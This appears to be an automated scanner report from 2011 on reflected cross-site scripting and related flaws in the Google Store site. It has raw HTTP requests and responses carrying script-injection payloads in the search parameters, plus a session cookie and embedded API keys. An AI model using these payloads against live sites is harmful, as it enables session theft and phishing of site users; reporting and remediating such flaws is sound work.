XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, Search, googlestore.com

Report generated by XSS.CX at Fri Oct 21 14:38:47 CDT 2011.

1. Cross-site scripting (reflected)

1.1. http://www.googlestore.com/googlesearch.aspx [category parameter]

XSS in googlestore.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.2. http://www.googlestore.com/googlesearch.aspx [name of an arbitrarily supplied request parameter]

1.3. http://www.googlestore.com/googlesearch.aspx [q parameter]

1.4. http://www.googlestore.com/googlesearch.aspx [x parameter]

1.5. http://www.googlestore.com/googlesearch.aspx [y parameter]

2. ASP.NET ViewState without MAC enabled

2.1. http://www.googlestore.com/Wearables/Organic+Black+is+Back+T-Shirt.axd

2.2. http://www.googlestore.com/googlesearch.aspx

2.3. http://www.googlestore.com/shop.axd/PrivacyPolicy

2.4. http://www.googlestore.com/shoppingcart.aspx

3. Cross-domain Referer leakage

3.1. http://www.googlestore.com/googlesearch.aspx

3.2. http://www.googlestore.com/shoppingcart.aspx

3.3. http://www.googlestore.com/shoppingcart.aspx

4. Cross-domain script include

4.1. http://www.googlestore.com/Eco/American+Apparel+Ladies+Organic+Tee.axd

4.2. http://www.googlestore.com/Mini/

4.3. http://www.googlestore.com/Mini/Google+Mini+2+0+300K+-+2+YR.axd

4.4. http://www.googlestore.com/Office/Momentum+Computer+Portfolio.axd

4.5. http://www.googlestore.com/Office/Pack+of+10+Recycled+Paper+Pencils.axd

4.6. http://www.googlestore.com/Office/Reversible+Neoprene+Laptop+Sleeve.axd

4.7. http://www.googlestore.com/Wearables/Organic+Black+is+Back+T-Shirt.axd

4.8. http://www.googlestore.com/Wearables/Tiki+Android+T-Shirt.axd

4.9. http://www.googlestore.com/googlesearch.aspx

4.10. http://www.googlestore.com/shop.axd/Home

4.11. http://www.googlestore.com/shop.axd/PrivacyPolicy

4.12. http://www.googlestore.com/shoppingcart.aspx

5. Email addresses disclosed

1. Cross-site scripting (reflected) next
There are 5 instances of this issue:

/googlesearch.aspx [category parameter]
/googlesearch.aspx [name of an arbitrarily supplied request parameter]
/googlesearch.aspx [q parameter]
/googlesearch.aspx [x parameter]
/googlesearch.aspx [y parameter]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://www.googlestore.com/googlesearch.aspx [category parameter] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/googlesearch.aspx

Issue detail

The value of the category request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e88ac'><script>alert(1)</script>f4213a3933b was submitted in the category parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /googlesearch.aspx?category=accessoriese88ac'><script>alert(1)</script>f4213a3933b&q=xss+123+456+7890f3d8a%253cscript%253ealert%2528document.location%2529%253c%252fscript%253e17349f37484&x=0&y=0 HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/googlesearch.aspx?category=accessories&q=xss+123+456+7890f3d8a%253cscript%253ealert%2528document.location%2529%253c%252fscript%253e17349f37484&x=0&y=0
Cookie: ASP.NET_SessionId=4n1rd3u3ovrt2o45f1fvmo45; __utma=148589601.1599814706.1319223601.1319223601.1319223601.1; __utmb=148589601.43.9.1319224888597; __utmc=148589601; __utmz=148589601.1319223601.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SupportCookies=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 2709

__VIEWSTATE=%2FwEPDwUJNjU2NjA3MTQwD2QWFmYPZBYCAgEPFgIeCWlubmVyaHRtbAWxAzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Pyc%2BQmVzdCBNYXRjaDwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MCZ5PTAmcmFua0J5PXByaWNlOmFzY2VuZGluZyc%2BUHJpY2UgKCQtJCQkKTwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhJTNjc2NyaXB0JTNlYWxlcnQlMjhkb2N1bWVudC5sb2NhdGlvbiUyOSUzYyUyZnNjcmlwdCUzZTE3MzQ5ZjM3NDg0Jng9MCZ5PTAmcmFua0J5PXByaWNlOmRlc2NlbmRpbmcnPlByaWNlICgkJCQtJCk8L2E%2BPGJyLz5kAgEPFgIeB1Zpc2libGVoFgICAQ8WAh8AZWQCAg8WAh8BaBYCAgEPFgIfAGVkAgMPFgIfAWgWAgIBDxYCHwBlZAIEDxYCHwBlZAIFDxYCHwAF0QI8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweCc%2BSG9tZTwvYT4mbmJzcDsvJm5ic3A7PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FcT14c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQnLz5hY2Nlc3NvcmllczwvYT4mbmJzcDsvJm5ic3A7PGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FY2F0ZWdvcnk9YWNjZXNzb3JpZXMnLz54c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQ8L2E%2BZAIGDxYCHwBlZAIHDxYCHwAFnQI8aDI%2BPGNlbnRlcj5EaWQgeW91IG1lYW4gPGk%2BPGZvbnQgY29sb3I9J2JsdWUnID4gPGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg%2FY2F0ZWdvcnk9YWNjZXNzb3JpZXMmeD0wJnk9MCZxPXhzcyAxMjMgNDU2IDc4OTAgZjNkOCBzY3JpcHQgYWxlcnQoZG9jdW1lbnQubG9jYXRpb24pL3NjcmlwdCAxNzM0OWYzNzQ4NCcvPiB4c3MgMTIzIDQ1NiA3ODkwIGYzZDggc2NyaXB0IGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQgMTczNDlmMzc0ODQ8L2E%2BPzwvZm9udD48L2k%2BPC9oMj48L2NlbnRlcj5kAggPFgIfAAWKATxkaXYgY2xhc3M9Im5vLXJlc3VsdHMiPk5vIFJlc3VsdHMgRm91bmQgZm9yIHNlYXJjaCA8aT54c3MgMTIzIDQ1NiA3ODkwZjNkOGE8c2NyaXB0PmFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKTwvc2NyaXB0PjE3MzQ5ZjM3NDg0PC9pPjwvZGl2PmQCCQ9kFgICAQ9kFgICAw8PFgIeCEltYWdlVXJsBRYvaW1hZ2VzL2J0bl9zaWdudXAuZ2lmZGQCCw8WAh8ABakDaHR0cHM6Ly93d3cuZ29vZ2xlYXBpcy5jb20vc2hvcHBpbmcvc2VhcmNoL3YxL2N4OjAxNjQ1ODUwMTY0NTg4NDA1NzkxMjpkcV9peGJ3aHVrOC9wcm9kdWN0cz9mYWNldHMuZW5hYmxlZD10cnVlJmNvdW50cnk9dXMmbWF4UmVzdWx0cz0xMiZmYWNldHMudXNlR2NzQ29uZmlnPVRydWUmZmFjZXRzLmRpc2NvdmVyPTEwMDoxMDAmYWx0PWF0b20mc3BlbGxpbmcuZW5hYmxlZD10cnVlJnByb21vdGlvbnMuZW5hYmxlZD10cnVlJnByb21vdGlvbnMudXNlR2NzQ29uZmlnPXRydWUma2V5PUFJemFTeUNTSk1hdjZheWdqbFYzenUwdmw0MGpick1oZEtmRmNybyZxPXhzcyAxMjMgNDU2IDc4OTBmM2Q4YXNjcmlwdGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQxNzM0OWYzNzQ4NCZyZXN0cmljdEJ5PWdzY2F0ZWdvcnkodGV4dCk6YWNjZXNzb3JpZXNkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBRNjdGxTaWdudXAkYnRuU2lnblVw&__EVENTVALIDATION=%2FwEWAwLdgJGXBAKs4eTNDgK6oZTsCg%3D%3D&ctlSignup%24EmailAddress=cdd&ctlSignup%24btnSignUp.x=37&ctlSignup%24btnSignUp.y=7

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20292
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Oct 2011 19:26:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Google Online Store :: Product Search</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name='keywords' content='Google Online Store' />
<meta http-equiv="pragma" content="no-cache">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<meta name='description' content='Google Online Store' />
<script language="JavaScript" type="text/JavaScript" src="/js/common.js"></script>
<link href="/css/main.css" rel="stylesheet" type="text/css" />
<link href="/css/home.css" rel="stylesheet" type="text/css" />
    

<script type="text/javascript">
var r = Math.random();
var t = document.createElement("img");
t.onload = function() {
var t2 = document.createElement("img");
t2.onload = function() {
var t3 = document.createElement("img");
t3.onload = function() { return; };
t3.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp3&random=" + r;
};
t2.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp2&random=" + r;
};
t.src = "http://www.google-analytics.com/__utm.gif?label=ct_gs_exp1&random=" + r;
</script>
<noscript>
<img src="http://www.google-analytics.com/__utm.gif?label=ct_gs_exp_ns" />
</noscript>

<style type="text/css">
.filterBox a{
line-height:18px;
font-size:11px;
}

.facet_holder
{
margin:8px 0px;
}
.no-results{ font-weight:bold; font-size:1.3em; margin-bottom:25px; text-align:center}
</style>
    <link rel="stylesheet" href="/css/syat.css" type="text/css" media="screen" />

</head>
<body>
<div id="wrapper">
<div id="header" style="height:70px">
<a href="/shop.axd/Home"><img src="/images/googlestore_logo.gif" alt="GoogleStore" /></a>
<div style="position:absolute; top:0; right:0px; width:90px; height:52px;">
<a href="/googlesearch.aspx?category=you tube"><img style="border:0" src="/images/new_top_link.jpg" alt="Check Out the You Tube Items" /></a>
</div>
<ul>
<li><a href="/googlesearch.aspx/?category=youtube">You Tube Home</a></li>
<li><a href="http://www.google.com">Google Search</a></li>
<li><a href="http://www.google.com/about.html">About Google</a></li>
</ul>
</div>

<div id="left_content">
<div id="box-round">
<div class="top"><span><h2 class="side_head">Search Filters</h2></span></div>
<div class="center-content">
<div class="filterBox">
<div id="divsort_holder" class="facet_holder" style="margin-top:0px;">
<b>Sort By:</b><br/>
<div id="divsort" name="divsort"><a href='googlesearch.aspx?'>Best Match</a><br/><a href='googlesearch.aspx?category=accessoriese88acscriptalert(1)/scriptf4213a3933b&q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484&x=0&y=0&rankBy=price:ascending'>Price ($-$$$)</a><br/><a href='googlesearch.aspx?category=accessoriese88acscriptalert(1)/scriptf4213a3933b&q=xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484&x=0&y=0&rankBy=price:descending'>Price ($$$-$)</a><br/></div>
</div>

<div class="facet_holder">
<b>Shop By Other:</b><br />
<div id="divshop" name="divshop">
<a href="googlesearch.aspx?topseller=yes">Top Sellers</a><br />
<a href="googlesearch.aspx?isnew=yes">What's New</a><br />
<a href="googlesearch.aspx?category=eco">Eco-Friendly Items</a><br />
<a href="googlesearch.aspx?specials=yes">Specials</a>
</div>
</div>

</div> 
</div> 

<div class="bottom"><span></span></div>
</div> 
</div> 

<div id="content">
<script language="javascript">
function ajaxGetRequest(url, divName) {
$("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Loading search results</h1><div style=\"height:40px;padding-top:10px;\"><p id=\"indicator\" style=\"margin-top:0px;\"><img src=\"/images/indicator.gif\" /> Loading...</p></div>");

$.ajax({
url: url,
cache: true,
success: function (html) {
var isValid = html.indexOf("<div id=\"\products\">");
if (isValid != -1) {
$("#" + divName).empty().html(html);
} else {
$("#" + divName).empty().html("<div id=\"categoryhead\"><h1>Search results</h1>An error occurred. Try to search on the right-hand navigation for the products you are looking for.</div>");
}
}
})

}
</script>

<div id="products">

<div id="category-head">
<form method="GET" name="search" id="search" action="googlesearch.aspx" style="font-size:15px;">
<b>Search:</b>
<select name="category" style="font-size:13px;">

<option value="all">All Products</option>
<option value="eco" >Eco-Friendly</option>
<option value="wearables" >Wearables</option>
<option value="youtube" >You Tube</option>
<option value="accessories" >Accessories</option>
<option value="office" >Office</option>
<option value="kids" >Kids</option>
<option value="fun" >Fun</option>
<option value="apps" >Apps</option>
</select>

<input name="q" id="q" class="searchbox" style="width:280px; color:#333;" value="keyword / item #" autocomplete="off" onfocus="if(this.value=='keyword / item #')value=''" onblur="if(this.value=='')value='keyword / item #';" type="text"/>
<input type="image" src="/images/btn_search.gif" class="button" value="search" />
</form>

<br />
<a href="/Specials/"><img border="0" src='/content/BannerImages/youtubesalebanner.jpg' alt=''></a>
<br />
<div style="position:relative">

<h1>Displaying All Products</h1>
<div style="clear:left"></div>
</div>

<div id="top_paging">

<div class="paging_top" style="padding-right:15px;">
<div id="pagenav" name="pagename"></div>
</div>
<div id="divbreadcrumbs" name="divbreadcrumbs"><a href='googlesearch.aspx'>Home</a> / <a href='googlesearch.aspx?category=accessoriese88acscriptalert(1)/scriptf4213a3933b'/>xss 123 456 7890f3d8a%3cscript%3ealert%28document.location%29%3c%2fscript%3e17349f37484</a></div>
</div>

<div style="clear:both"> </div>

<div id="divpromotions" name="divpromotions"></div>
<div id="divspell" name="divspell"><h2><center>Did you mean <i><font color='blue' > <a href='googlesearch.aspx?category=accessoriese88ac'><script>alert(1)</script>f4213a3933b&x=0&y=0&q=xss 123 456 7890 f3d8 script alert(document.location)/script 17349f37484'/> xss 123 456 7890 f3d8 script alert(document.location)/script 17349f37484</a>?</font></i></h2></center></div>
<div id="divsearchresults" name="divsearchresults"><div class="no-results">No Results Found for search <i>xss 123 456 7890f3d8a<script>alert(document.location)</script>17349f37484</i></div></div>

<div class="paging_bottom" id="pagenav_bottom"></div>
</div>
</div>
</div>

<div id="right_content">

<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="ctlSignup_Label1" class="formerror">Invalid Email Format</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNjU2NjA3MTQwD2QWFmYPZBYCAgEPFgIeCWlubmVyaHRtbAX7AzxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Pyc+QmVzdCBNYXRjaDwvYT48YnIvPjxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4P2NhdGVnb3J5PWFjY2Vzc29yaWVzZTg4YWNzY3JpcHRhbGVydCgxKS9zY3JpcHRmNDIxM2EzOTMzYiZxPXhzcyAxMjMgNDU2IDc4OTBmM2Q4YSUzY3NjcmlwdCUzZWFsZXJ0JTI4ZG9jdW1lbnQubG9jYXRpb24lMjklM2MlMmZzY3JpcHQlM2UxNzM0OWYzNzQ4NCZ4PTAmeT0wJnJhbmtCeT1wcmljZTphc2NlbmRpbmcnPlByaWNlICgkLSQkJCk8L2E+PGJyLz48YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD9jYXRlZ29yeT1hY2Nlc3Nvcmllc2U4OGFjc2NyaXB0YWxlcnQoMSkvc2NyaXB0ZjQyMTNhMzkzM2ImcT14c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQmeD0wJnk9MCZyYW5rQnk9cHJpY2U6ZGVzY2VuZGluZyc+UHJpY2UgKCQkJC0kKTwvYT48YnIvPmQCAQ8WAh4HVmlzaWJsZWgWAgIBDxYCHwBlZAICDxYCHwFoFgICAQ8WAh8AZWQCAw8WAh8BaBYCAgEPFgIfAGVkAgQPFgIfAGVkAgUPFgIfAAXjATxhIGhyZWY9J2dvb2dsZXNlYXJjaC5hc3B4Jz5Ib21lPC9hPiZuYnNwOy8mbmJzcDs8YSBocmVmPSdnb29nbGVzZWFyY2guYXNweD9jYXRlZ29yeT1hY2Nlc3Nvcmllc2U4OGFjc2NyaXB0YWxlcnQoMSkvc2NyaXB0ZjQyMTNhMzkzM2InLz54c3MgMTIzIDQ1NiA3ODkwZjNkOGElM2NzY3JpcHQlM2VhbGVydCUyOGRvY3VtZW50LmxvY2F0aW9uJTI5JTNjJTJmc2NyaXB0JTNlMTczNDlmMzc0ODQ8L2E+ZAIGDxYCHwBlZAIHDxYCHwAFyAI8aDI+PGNlbnRlcj5EaWQgeW91IG1lYW4gPGk+PGZvbnQgY29sb3I9J2JsdWUnID4gPGEgaHJlZj0nZ29vZ2xlc2VhcmNoLmFzcHg/Y2F0ZWdvcnk9YWNjZXNzb3JpZXNlODhhYyc+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0PmY0MjEzYTM5MzNiJng9MCZ5PTAmcT14c3MgMTIzIDQ1NiA3ODkwIGYzZDggc2NyaXB0IGFsZXJ0KGRvY3VtZW50LmxvY2F0aW9uKS9zY3JpcHQgMTczNDlmMzc0ODQnLz4geHNzIDEyMyA0NTYgNzg5MCBmM2Q4IHNjcmlwdCBhbGVydChkb2N1bWVudC5sb2NhdGlvbikvc2NyaXB0IDE3MzQ5ZjM3NDg0PC9hPj88L2ZvbnQ+PC9pPjwvaDI+PC9jZW50ZXI+ZAIIDxYCHwAFigE8ZGl2IGNsYXNzPSJuby1yZXN1bHRzIj5ObyBSZXN1bHRzIEZvdW5kIGZvciBzZWFyY2ggPGk+eHNzIDEyMyA0NTYgNzg5MGYzZDhhPHNjcmlwdD5hbGVydChkb2N1bWVudC5sb2NhdGlvbik8L3NjcmlwdD4xNzM0OWYzNzQ4NDwvaT48L2Rpdj5kAgkPZBYEZg8PFgYeCENzc0NsYXNzBQlmb3JtZXJyb3IeBFRleHQFFEludmFsaWQgRW1haWwgRm9ybWF0HgRfIVNCAgJkZAIBD2QWAgIDDw8WAh4ISW1hZ2VVcmwFFi9pbWFnZXMvYnRuX3NpZ251cC5naWZkZAILDxYCHwAFgQNodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbS9zaG9wcGluZy9zZWFyY2gvdjEvY3g6MDE2NDU4NTAxNjQ1ODg0MDU3OTEyOmRxX2l4YndodWs4L3Byb2R1Y3RzP2ZhY2V0cy5lbmFibGVkPXRydWUmY291bnRyeT11cyZtYXhSZXN1bHRzPTEyJmZhY2V0cy51c2VHY3NDb25maWc9VHJ1ZSZmYWNldHMuZGlzY292ZXI9MTAwOjEwMCZhbHQ9YXRvbSZzcGVsbGluZy5lbmFibGVkPXRydWUmcHJvbW90aW9ucy5lbmFibGVkPXRydWUmcHJvbW90aW9ucy51c2VHY3NDb25maWc9dHJ1ZSZrZXk9QUl6YVN5Q1NKTWF2NmF5Z2psVjN6dTB2bDQwamJyTWhkS2ZGY3JvJnE9eHNzIDEyMyA0NTYgNzg5MGYzZDhhc2NyaXB0YWxlcnQoZG9jdW1lbnQubG9jYXRpb24pL3NjcmlwdDE3MzQ5ZjM3NDg0ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUTY3RsU2lnbnVwJGJ0blNpZ25VcA==" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwK2qs6XAgKs4eTNDgK6oZTsCg==" />
</div>
<input name="ctlSignup$EmailAddress" type="text" value="cdd" maxlength="50" id="ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="ctlSignup$btnSignUp" id="ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round" >
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>

<div class="center-content">
<ul class="store-links">
<li><a style="font-size:11px;" href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (0)</a></li>
<li><a style="font-size:11px;" href="/shop.axd/Contact">Customer Service</a></li>
<li><a style="font-size:11px;" href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>
<li><a style="font-size:11px;" href="/Mini/"><b>Google Mini</b></a></li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>
<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Categories</h2></span></div>
<div class="center-content">
<ul>
<li class="nav off"><a class="main" style="background:url(/images/category_icons/accessories_off.gif) left no-repeat;" href="googlesearch.aspx?category=accessories" >Accessories</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/fun_off.gif) left no-repeat;" href="googlesearch.aspx?category=fun" >Fun</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/kids_off.gif) left no-repeat;" href="googlesearch.aspx?category=kids" >Kids</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/office_off.gif) left no-repeat;" href="googlesearch.aspx?category=office" >Office</a></li><li class="nav off"><a class="main" style="background:url(/images/category_icons/wearables_off.gif) left no-repeat;" href="googlesearch.aspx?category=wearables" >Wearables</a></li><li class="nav off"><a class="main textpopup" onclick="recordOutboundLink(this, 'Outbound Links', 'Zazzle.com LeftNav');return false;" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." style="background:url(/images/category_icons/doodles_off.gif) left no-repeat;" href=http://www.zazzle.com/googledoodles >Doodles on Demand</a>
</ul>
</div>

<div class="bottom"><span></span></div>
</div>
<div class="box-round" style="margin-top:10px;">
<div class="top"><span><h2 class="side_head">Eco Reference</h2></span></div>
<div class="center-content">
<ul class="eco_guide">
<li style="background:url(/images/greeninitiative/1.jpg) no-repeat left;">Sustainable</li>
<li style="background:url(/images/greeninitiative/2.jpg) no-repeat left;">Organic</li>
<li style="background:url(/images/greeninitiative/3.jpg) no-repeat left;">Recycled</li>
<li style="background:url(/images/greeninitiative/4.jpg) no-repeat left;">Non-Polluting</li>
</ul>
</div>
<div class="bottom"><span></span></div>
</div>
</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
</div>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");

</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<script src="http://www.google.com/jsapi" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="http://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script>
<script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</body>
</html>

1.2. http://www.googlestore.com/googlesearch.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/googlesearch.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9acfe'><script>alert(1)</script>e33fb55fc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /googlesearch.aspx?category=accessories&q=xss+123+456+7890f3d8a%253cscript%253ealert%2528document.location%2529%253c%252fscript%253e17349f37484&x=0&y=0&9acfe'><script>alert(1)</script>e33fb55fc1=1 HTTP/1.1
Host: www.googlestore.com
Proxy-Connection: keep-alive
